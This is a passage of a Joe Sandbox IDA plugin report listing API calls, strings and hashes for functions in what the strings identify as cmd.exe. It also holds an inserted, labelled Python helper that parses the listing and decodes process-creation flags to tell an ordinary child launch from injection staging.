                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                                                            • String ID:
                                                                            • API String ID: 1441200171-0
                                                                            • Opcode ID: a575400f4bbf510efcd11038e272825cf04f8f5a7dde4d68970f82794144eea6
                                                                            • Instruction ID: 8da2287b8808c66a37f5041a8486afe595f17178b3b84cb605ff94c6b3730b3c
                                                                            • Opcode Fuzzy Hash: a575400f4bbf510efcd11038e272825cf04f8f5a7dde4d68970f82794144eea6
                                                                            • Instruction Fuzzy Hash: DE9180716003009FDB24EF28D896A6A7BE1EF89720F2489ADE45AD72D1DF30EC51CB51
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00B16C76,00B01000), ref: 00B16B47
                                                                            • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00B16C76,?,00B16C76,00B01000), ref: 00B16B50
                                                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00B16C76,00B01000), ref: 00B16B5B
                                                                            • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00B16C76,00B01000), ref: 00B16B62
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                            • String ID:
                                                                            • API String ID: 3231755760-0
                                                                            • Opcode ID: 9fd45c23b5468eb92055c4a712667279ff5fcc295688831805849f573f5da788
                                                                            • Instruction ID: 49f6d52f3becc19b86e125c78af6cde2be75f441a2fd38308ea5e53620c954f7
                                                                            • Opcode Fuzzy Hash: 9fd45c23b5468eb92055c4a712667279ff5fcc295688831805849f573f5da788
                                                                            • Instruction Fuzzy Hash: 3BD0C97A084104ABCE002FE1EC0CA497F28FB46252F004000F30DC3121CE7646059B67
                                                                            APIs
                                                                            • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,?,00B22FDD), ref: 00B22E5D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 1347740429-0
                                                                            • Opcode ID: 91637e861bc1aae546be1193759ae3eb816a7a8496fbae9f73a26aa10c287182
                                                                            • Instruction ID: db60553b4c875cf9e7f397c0332686902dfe314bc2d1e56b4a930ecb33713291
                                                                            • Opcode Fuzzy Hash: 91637e861bc1aae546be1193759ae3eb816a7a8496fbae9f73a26aa10c287182
                                                                            • Instruction Fuzzy Hash: F4E0C234691231BBE7213B69BE883BE36CCAF1AB00B0604E5F419CB355CF449D04A7A1
                                                                            APIs
                                                                            • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,00B2C9D0,00000108,00B12107,?,00000000,00000000,00000000), ref: 00B094AA
                                                                            • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 00B094D9
                                                                            • memset.MSVCRT ref: 00B094F1
                                                                            • memset.MSVCRT ref: 00B0954A
                                                                            • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 00B0955D
                                                                              • Part of subcall function 00B11D90: _wcsnicmp.MSVCRT ref: 00B11E14
                                                                            • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 00B095B8
                                                                            • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00B09602
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00B09624
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00B1BDF1
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00B1BE0D
                                                                            • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 00B1BE26
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                            • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                            • API String ID: 1449572041-3461277227
                                                                            • Opcode ID: 4fdfe71af8c9654d4e4ebc2dccfb4199cd70b76d2bbfa9ac728d8def66b7ce8a
                                                                            • Instruction ID: 1af30111959aaa49fbef66fcf075eb8a62c1b4252f9ababa321daa08ba3b4e1f
                                                                            • Opcode Fuzzy Hash: 4fdfe71af8c9654d4e4ebc2dccfb4199cd70b76d2bbfa9ac728d8def66b7ce8a
                                                                            • Instruction Fuzzy Hash: DCC18075A003189FDB249F65DC45BEA7BF8EB45300F5044EAE60AD7291EB708E84CF61
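The function listed above is a complete child-launch site: InitializeProcThreadAttributeList, UpdateProcThreadAttribute with attribute 0x00060001, GetStartupInfoW, a compare against \XCOPY.EXE, and CreateProcessW with bInheritHandles = 1 and dwCreationFlags = 0x00080000. Reading such a sequence straight out of a Joe Sandbox export is faster with a small parser. The following Python is an added example and is not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses the "APIs" line format (the sample text is a subset of the lines above), checks that the attribute-list calls bracket CreateProcessW in call-site order, and decodes the attribute and creation-flag constants with the PROC_THREAD_ATTRIBUTE_* bit layout, PROC_THREAD_ATTRIBUTE_NUM values and CREATE_* flags from the Windows SDK headers (the attribute-number table is deliberately partial). It assumes the arguments are printed in call order, which is how the report lists them.

```python
"""Triage helper for Joe Sandbox "APIs" listings (added example, not part of
the report or of Joe Sandbox's tooling)."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: a subset of the lines from the function listing above.
SAMPLE_LISTING = r"""APIs
• InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,00B2C9D0,00000108,00B12107,?,00000000,00000000,00000000), ref: 00B094AA
• UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 00B094D9
• memset.MSVCRT ref: 00B094F1
• GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 00B0955D
  • Part of subcall function 00B11D90: _wcsnicmp.MSVCRT ref: 00B11E14
• lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 00B095B8
• CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00B09602
• DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 00B1BE26
"""

# One "APIs" line: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.MODULE, optional (args), then "ref: <call-site address>".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^.\s]+)\.(?P<module>[A-Za-z0-9_\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple            # raw tokens as the report prints them ('?' = unknown)
    ref: int               # call-site address
    caller: Optional[int]  # set for "Part of subcall function" lines

def parse_api_listing(text: str) -> list:
    """Return the ApiCall entries found in a pasted 'APIs' block; other lines
    (headers, strings) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                             int(m["caller"], 16) if m["caller"] else None))
    return calls

def hexarg(tok: str) -> Optional[int]:
    """Argument token -> int, or None when the report could not resolve it."""
    return None if tok == "?" else int(tok, 16)

# PROC_THREAD_ATTRIBUTE_* bit layout and PROC_THREAD_ATTRIBUTE_NUM values from
# the Windows SDK headers (partial table; other numbers are reported as unknown).
ATTR_NUMBER, ATTR_THREAD, ATTR_INPUT, ATTR_ADDITIVE = 0xFFFF, 0x10000, 0x20000, 0x40000
ATTR_NAMES = {0: "ParentProcess", 1: "ExtendedFlags", 2: "HandleList",
              3: "GroupAffinity", 4: "PreferredNode", 5: "IdealProcessor",
              6: "UmsThread", 7: "MitigationPolicy"}

def decode_proc_thread_attribute(value: int) -> dict:
    num = value & ATTR_NUMBER
    return {"number": num, "name": ATTR_NAMES.get(num, f"Unknown({num})"),
            "thread": bool(value & ATTR_THREAD), "input": bool(value & ATTR_INPUT),
            "additive": bool(value & ATTR_ADDITIVE)}

# dwCreationFlags values from the Windows SDK (the ones that matter in triage).
CREATION_FLAGS = {0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
                  0x00000010: "CREATE_NEW_CONSOLE", 0x00000400: "CREATE_UNICODE_ENVIRONMENT",
                  0x00080000: "EXTENDED_STARTUPINFO_PRESENT",
                  0x01000000: "CREATE_BREAKAWAY_FROM_JOB", 0x08000000: "CREATE_NO_WINDOW"}

def decode_creation_flags(value: int) -> list:
    names = [n for bit, n in sorted(CREATION_FLAGS.items()) if value & bit]
    rest = value & ~sum(CREATION_FLAGS)   # bits not in the table, kept as hex
    return names + ([f"0x{rest:08X}"] if rest else [])

def has_ordered_calls(calls, names) -> bool:
    """True if `names` occur as a subsequence of the function's own calls in
    call-site address order (subcall lines are ignored)."""
    own = iter(sorted((c for c in calls if c.caller is None), key=lambda c: c.ref))
    return all(any(c.name == n for c in own) for n in names)

def summarize_process_creation(calls) -> Optional[dict]:
    """Facts a triager wants from a CreateProcessW site: handle inheritance,
    decoded creation flags and the attribute set via UpdateProcThreadAttribute."""
    own = {c.name: c for c in calls if c.caller is None}
    cp = own.get("CreateProcessW")
    if cp is None:
        return None
    inherit, flags = hexarg(cp.args[4]), hexarg(cp.args[5])
    upd = own.get("UpdateProcThreadAttribute")
    attr = hexarg(upd.args[2]) if upd else None
    return {"inherit_handles": None if inherit is None else inherit != 0,
            "creation_flags": [] if flags is None else decode_creation_flags(flags),
            "attribute": None if attr is None else decode_proc_thread_attribute(attr)}

if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE_LISTING)
    print(has_ordered_calls(parsed, ["InitializeProcThreadAttributeList",
                                     "UpdateProcThreadAttribute", "CreateProcessW"]))
    print(summarize_process_creation(parsed))
```

On the sample, the decode gives attribute number 1 (ExtendedFlags) with the INPUT and ADDITIVE bits set, creation flags EXTENDED_STARTUPINFO_PRESENT, and handle inheritance enabled, which is exactly the STARTUPINFOEX launch the raw constants 0x00060001 and 0x00080000 encode. The same decoder applied to a HandleList (0x00020002) or MitigationPolicy (0x00020007) attribute, or to a CREATE_SUSPENDED launch, is what separates an interpreter's ordinary child spawn from a loader staging an injection target; the strings alongside this dump (CMDCMDLINE, CMDEXTVERSION, COPYCMD, FOR/?) are cmd.exe's own, so this site is the former.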
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B04781
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • _get_osfhandle.MSVCRT ref: 00B047E4
                                                                            • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00B047EC
                                                                            • _get_osfhandle.MSVCRT ref: 00B047FD
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B04805
                                                                              • Part of subcall function 00B0A16C: _close.MSVCRT ref: 00B0A19B
                                                                            • _get_osfhandle.MSVCRT ref: 00B04832
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00B0483A
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B04871
                                                                            • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000001), ref: 00B18120
                                                                            • memmove.MSVCRT(?,?,?), ref: 00B18191
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,?,00000000), ref: 00B18328
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B1832F
                                                                              • Part of subcall function 00B0DD98: _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                              • Part of subcall function 00B0DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            • API ID: File_get_osfhandle$memset$ConsoleHandlePathPointerReadSearchSizeTypeWrite_closememmove
                                                                            • String ID: DPATH
                                                                            • API String ID: 2545859659-2010427443
                                                                            • Opcode ID: 42314175a1396598c103a7dc9673bb543c2a3d18a597d6d0fdab3972258aa365
                                                                            • Instruction ID: f1bbc6c6cfdca8560819246db12ff1a6100a711288019e1423c6a6b8b0b261cf
                                                                            • Opcode Fuzzy Hash: 42314175a1396598c103a7dc9673bb543c2a3d18a597d6d0fdab3972258aa365
                                                                            • Instruction Fuzzy Hash: 5FF1BE715083419FD724CF24C888BABBBE8FB89710F544A6DF99993290DF70D985CB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            • API ID: _wcsicmp$iswspace
                                                                            • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                            • API String ID: 759518647-875390083
                                                                            • Opcode ID: 49f75584f3435686d4eeb1a2dc1253f5795ea894c80917a88e3c07a5a243da51
                                                                            • Instruction ID: 6b61cdb585969e58c6e68047c3f76878f13bb002ad94b35a26716fd31026526a
                                                                            • Opcode Fuzzy Hash: 49f75584f3435686d4eeb1a2dc1253f5795ea894c80917a88e3c07a5a243da51
                                                                            • Instruction Fuzzy Hash: ECA136342443028AE7386B24AC5ABBB3BE4EF41710F5448EEE602871E1DFB4C9D0C75A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            • API ID: iswdigit$iswspacewcschr$_setjmp3
                                                                            • String ID: ()|&=,;"$=,;$@$Ungetting: '%s'
                                                                            • API String ID: 684130364-3872429996
                                                                            • Opcode ID: 4ac812b3262fe8e79471aeb863c3c1063715028731e0c3dba6c4fe104fd9562f
                                                                            • Instruction ID: de6fa3438ef6adb1d7063dfd16ac800b35e2a383e025caa5530b503bf3460a2a
                                                                            • Opcode Fuzzy Hash: 4ac812b3262fe8e79471aeb863c3c1063715028731e0c3dba6c4fe104fd9562f
                                                                            • Instruction Fuzzy Hash: 56E1F375A002119ACB208FE8D88537E7FE1EF61340F2481E6EC4AD72D1EB35CE45975A
                                                                            APIs
                                                                            • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B2E590,00002000,?,00B48BF0,00000000,?,?,00B08F0D), ref: 00B0EC51
                                                                            • _wcsicmp.MSVCRT ref: 00B0EC77
                                                                            • _wcsicmp.MSVCRT ref: 00B0EC8D
                                                                            • _wcsicmp.MSVCRT ref: 00B0ECA3
                                                                            • _wcsicmp.MSVCRT ref: 00B0ECB9
                                                                            • _wcsicmp.MSVCRT ref: 00B0ECCF
                                                                            • _wcsicmp.MSVCRT ref: 00B0ECE5
                                                                            • _wcsicmp.MSVCRT ref: 00B0ECF7
                                                                            • _wcsicmp.MSVCRT ref: 00B0ED0D
                                                                              • Part of subcall function 00B09310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00B2E590,?,00002000), ref: 00B09342
                                                                              • Part of subcall function 00B09310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B09356
                                                                              • Part of subcall function 00B09310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00B0936A
                                                                              • Part of subcall function 00B09310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B0937E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                            • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                            • API String ID: 2447294730-2301591722
                                                                            • Opcode ID: b88d33267aee3487777defd33a0b62b26f3ca1700118d571c41e31aa3a95929d
                                                                            • Instruction ID: 8701577a323d1b286f1b6cfa8e3fd88e8d94555604ae292aa9b4ddc2a96f960d
                                                                            • Opcode Fuzzy Hash: b88d33267aee3487777defd33a0b62b26f3ca1700118d571c41e31aa3a95929d
                                                                            • Instruction Fuzzy Hash: 0A310936248312BFF7181721AC5EA6F2FDDFB46320B2848A9F522D20D1EF55D901826A
                                                                            APIs
                                                                            • _wcsupr.MSVCRT ref: 00B29CC8
                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00B29D22
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00B29D2A
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B29D3A
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B29D50
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00B29D58
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B29D68
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B29D7C
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00B29DDB
                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00B29DE2
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00B29DF2
                                                                            • towupper.MSVCRT ref: 00B29E13
                                                                              • Part of subcall function 00B0A16C: _close.MSVCRT ref: 00B0A19B
                                                                            • wcschr.MSVCRT ref: 00B29E6A
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00B29E9B
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00B29EA9
                                                                              • Part of subcall function 00B0DD98: _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                              • Part of subcall function 00B0DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                            • String ID: <noalias>$CMD.EXE
                                                                            • API String ID: 2015057810-1690691951
                                                                            • Opcode ID: 6e6019b845ee32e49b4b797e5b7754e60a385c0f2496fde0869c02c6f16fe61b
                                                                            • Instruction ID: 021e528ce5d199cf8b6302d082d1f7c0f744f5d5853a161f4bec7b8df6727ef3
                                                                            • Opcode Fuzzy Hash: 6e6019b845ee32e49b4b797e5b7754e60a385c0f2496fde0869c02c6f16fe61b
                                                                            • Instruction Fuzzy Hash: 7281D276A002249BDB14ABB4EC496FEBBF9EF0A710F1501A9F809E72D0DB3199418765
                                                                            APIs
                                                                              • Part of subcall function 00B09A11: _get_osfhandle.MSVCRT ref: 00B09A1C
                                                                              • Part of subcall function 00B09A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B0793A,00000104,?), ref: 00B09A2B
                                                                              • Part of subcall function 00B09A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A47
                                                                              • Part of subcall function 00B09A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A56
                                                                              • Part of subcall function 00B09A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A61
                                                                              • Part of subcall function 00B09A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A6A
                                                                            • _get_osfhandle.MSVCRT ref: 00B07943
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B07951
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00B40AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 00B079BE
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00B07A1C
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B07A27
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                            • String ID:
                                                                            • API String ID: 2173784998-0
                                                                            • Opcode ID: adaf878e29ed19dd62242dd0280a7ec1fcbf1f1d016a40e216ebf0a56c8d4741
                                                                            • Instruction ID: 0db4afadc9ce2dfbe0207e0a020e226a5df9794621c833900a853d29aa433726
                                                                            • Opcode Fuzzy Hash: adaf878e29ed19dd62242dd0280a7ec1fcbf1f1d016a40e216ebf0a56c8d4741
                                                                            • Instruction Fuzzy Hash: 67717F75E44218AFDB149FA5DC88AAEBBF9FF45311F10406AE906E3250DF30AA40CB91
                                                                            APIs
                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00B22931
                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00B22998
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
